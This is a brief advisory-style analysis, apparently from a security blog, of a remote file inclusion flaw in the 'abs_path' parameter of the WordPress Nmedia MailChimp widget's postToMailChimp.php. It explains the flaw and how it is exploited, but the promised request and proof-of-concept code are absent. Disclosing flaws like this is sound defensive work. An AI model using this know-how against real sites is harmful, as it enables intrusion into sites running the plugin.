WordPress Nmedia MailChimp widget “abs_path” remote file inclusion vulnerability

Advisory
Secunia Advisory SA 49538

Analysis
This vulnerability is nothing but a textbook arbitrary file inclusion vulnerability. The file is used to interacting with the mailchimp API. But the very first 2 lines of executable code in /api_mailchimp/postToMailChimp.php, it goes ahead and accepts a path for loading a file.

By making following request, where the url has a file called ‘wp-load.php’ or otherwise will return php code, or using the proof of concept code, we can exploit this

Proof of concept code

Leave a Reply